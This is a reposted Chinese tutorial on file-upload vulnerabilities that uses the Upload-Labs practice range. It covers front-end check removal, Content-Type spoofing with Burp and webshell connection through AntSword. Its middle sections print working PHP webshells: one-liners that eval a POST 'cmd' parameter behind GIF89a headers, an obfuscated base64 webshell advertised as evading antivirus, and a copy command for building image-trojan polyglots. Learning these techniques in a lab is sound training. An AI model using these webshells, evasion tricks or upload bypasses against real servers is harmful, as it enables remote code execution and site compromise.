网安入门11-文件上传(前后端绕过,变形马图片马)

这篇具有很好参考价值的文章主要介绍了网安入门11-文件上传(前后端绕过,变形马图片马)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Upload-Labs

Upload-Labs是一个使用PHP语言编写、专注于文件上传漏洞的闯关式网络安全靶场。练习该靶场可以有效地了解并掌握文件上传漏洞的原理、利用方法和修复方案。
网安入门11-文件上传(前后端绕过,变形马图片马),CISP-PTE备考之路,安全,php,网络安全,密码学
思考:他只让我传一个.jpg的图片,我想传一个.php的木马,两者什么区别

  1. 文件类型不一样
  2. 文件大小不一样
  3. 内容不一样,php有<?php>,eval等关键字

前端校验

Pass-01
通过F12查看源代码定位发现有一个checkFile()函数,删掉即可
网安入门11-文件上传(前后端绕过,变形马图片马),CISP-PTE备考之路,安全,php,网络安全,密码学

后端(服务端)校验-文件类型绕过

Pass-02
这一关我们故技重施发现不行了,那么就不只是前端校验了,后端也有校验
网安入门11-文件上传(前后端绕过,变形马图片马),CISP-PTE备考之路,安全,php,网络安全,密码学我们打开burp抓包
网安入门11-文件上传(前后端绕过,变形马图片马),CISP-PTE备考之路,安全,php,网络安全,密码学
我们注意到这里面有个HTTP头叫做Content-Type,这是我上传php的
我们再上传一个jpg,看看Content-Type是什么样
这时候就变成了image-jpeg(不用在意这些乱码)
网安入门11-文件上传(前后端绕过,变形马图片马),CISP-PTE备考之路,安全,php,网络安全,密码学
我们思路就来了,上传一个php,burp抓包改Content-Type,改成image/jpeg就ok啦
不改Content-Type头,回显“文件类型不正确,请重新上传”
网安入门11-文件上传(前后端绕过,变形马图片马),CISP-PTE备考之路,安全,php,网络安全,密码学
改了之后,就回显了上传成功之后的相对路径
网安入门11-文件上传(前后端绕过,变形马图片马),CISP-PTE备考之路,安全,php,网络安全,密码学
相对路径直接复制到蚁剑,连接之后就可以成功啦
网安入门11-文件上传(前后端绕过,变形马图片马),CISP-PTE备考之路,安全,php,网络安全,密码学
​Pass-02的后端验证仅仅使用了MIME类型进行验证,这样是不安全的。我们仍然可以使用BurpSuite伪造MIME类型绕过验证。将Content-type改为image/png即可。

变形木马

如果开发网站的程序员过滤了<?php>这样的关键字,那我们该如何绕过?
可以使用Javascript代码绕过

php5适用的木马(大部分首选)
GIF89a
#define width 1337
#define height 1337
#只支持php5
<script language="php">@eval(&_POST['cmd']);phpinfo();</script>
php7适用的木马
GIF89a
#define width 1337
#define height 1337
<?=@eval(&_POST['cmd']);
免杀一句话木马(sqzr)
<?php 
$uf="snc3"; //pass is sqzr
$ka="IEBldmFbsK"; 
$pjt="CRfUE9TVF"; 
$vbl = str_replace("ti","","tistittirti_rtietipltiatice"); 
$iqw="F6ciddKTs="; 
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke"); 
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn"); 
$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw))); $mpy(); 
?> 

图片木马

如果开发者限制了上传文件的大小,例如一张图片至少要大于200kb,那我们就要用到图片木马

首先,先准备一个一句话木马1.php还有一个图片2.jpg
网安入门11-文件上传(前后端绕过,变形马图片马),CISP-PTE备考之路,安全,php,网络安全,密码学
在终端中使用语句copy 2.jpg/b+1.php/a zyh.jpg,我们的图片马就做好了
网安入门11-文件上传(前后端绕过,变形马图片马),CISP-PTE备考之路,安全,php,网络安全,密码学现在这个zyh.php既有图片的功能,又有木马的功能,当他后缀为jpg时,就为图片,当他后缀为php时,就为木马文章来源地址https://www.toymoban.com/news/detail-822249.html

到了这里,关于网安入门11-文件上传(前后端绕过,变形马图片马)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 文件上传漏洞(1), 文件上传绕过原理

    一, 前端校验上传文件 添加 Javascript 代码,然后在 form 表单中 添加 onsubmit=\\\"returb checkFile()\\\" 绕过前端: 1. 在浏览器设置中禁用js 通常不建议使用这种方式, 因为前端js中可能存在很多其他js的功能, 例如ajax请求. 2. 用burpsuite等工具修改请求. 因为前端js对文件类型做了限制, 那么将

    2024年02月08日
    浏览(45)
  • 文件上传漏洞基础/htaccess重写解析绕过/大小写绕过上传/windows特性绕过

    目录 一、htaccess重写解析绕过上传 htaccess文件 htaccess文件上传 靶场练习pass-04 代码分析 创建.htaccess文件 开始上传 访问 二、大小写绕过 upload-labs pass-05 代码分析 上传 访问 ​编辑  三、空格绕过上传 pass-06 代码分析 尝试上传 访问 四、利用windows系统特征绕过上传 pass-07 代码

    2024年02月13日
    浏览(44)
  • 文件上传-绕过文件类型

            小伙伴们大家好!本期为大家带来的文件上传漏洞之绕过文件类型。 目录 原理 Content-Type PHP代码如何获取上传文件的类型 实战演示 1、测试网站的功能是否正常 2、尝试上传webshell 3、使用连接工具连接webshell  总结         当我们上传文件的时候,不仅前端要检

    2024年02月11日
    浏览(38)
  • 文件上传漏洞(2), 文件上传实战绕过思路, 基础篇

    准备一句话木马文件 mm.php 一, 前端绕过 p1 浏览器禁用js 先把 mm.php 后缀名修改为 mm.jpg , 点击提交后, 用 burp 截取请求, 将数据包中的文件名修改回 mm.php 再提交. 二, 类型MIME绕过 p2 使用 burp 修改 Content-Type: image/jpeg 三, 黑名单绕过 p3 后端禁止上传.asp|.aspx|.php|.jsp后缀文件. apac

    2024年02月08日
    浏览(50)
  • 文件上传常用绕过方式

    JavaScript 验证就是所谓的客户端验证,也是最脆弱的一种验证。直接修改数据包或禁用 JavaScript.enable 即可绕过。 例如upload的第一题,在我们点击发送时,还没经过代理就直接弹窗报错,就考虑存在前端验证 我们只需要将前端验证的布尔值改为false,重新加载后就能绕过前端验

    2024年02月13日
    浏览(28)
  • 【文件上传漏洞绕过方式】

    目录 前言 正文 总结   目前,文件上传往往在业务中不可避免,也是极其容易出现上传漏洞。根据owasptop10中的排名,文件上传漏洞(属于攻击检测和防范不足)高居其中。今天和大家分享常见的文件上传的绕过方式。  绕过方式一:前端绕过  首先,根据前端页面队上传文

    2023年04月08日
    浏览(49)
  • 文件上传验证常见的绕过方式!

    目前,文件上传在公司项目中是非常常见的一项业务,但极其容易出现上传漏洞。根据owasptop10中的排名,文件上传漏洞(属于攻击检测和防范不足)高居其中。今天给大家总结一下文件上传验证的绕过方式,以下是详细的内容: 1、JavaScript验证绕过 JavaScript验证就是所谓的客户

    2024年02月14日
    浏览(33)
  • 【网络安全】文件上传绕过思路

    分享一些文件上传绕过的思路,下文内容多包含实战图片,所以打码会非常严重,可多看文字表达;本文仅用于交流学习, 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 一次项目渗透时,

    2023年04月21日
    浏览(37)
  • (前后端交互式)Ajax上传图片 + 更换背景图片

    上传-图片 注意1:上传的图片必须在2MB以内 注意2:服务器端oss(阿里云对象存储)为了安全性,图片url网址不能直接在浏览器地址栏访问 请用img/背景图方式进行使用 上传图片的代码实现 * 1. 获取图片文件 * 2. 使用 FormData 携带图片文件 * 3. 提交到服务器,获取图片url网址使

    2024年02月14日
    浏览(44)
  • 文件上传漏洞基础/content-type绕过/黑名单绕过/

    目录 一、content-type绕过 contenent-type 源代码分析 绕过方式 尝试绕过 二、黑名单绕过 黑名单 代码分析 绕过方法 尝试绕过 contenent-type 有些上传模块,会对http的类型头进行检测,如果是图片类型,允许上传文件到服务器,否则返回上传失败。因为服务器是通过ent-type判断类型,

    2024年02月07日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包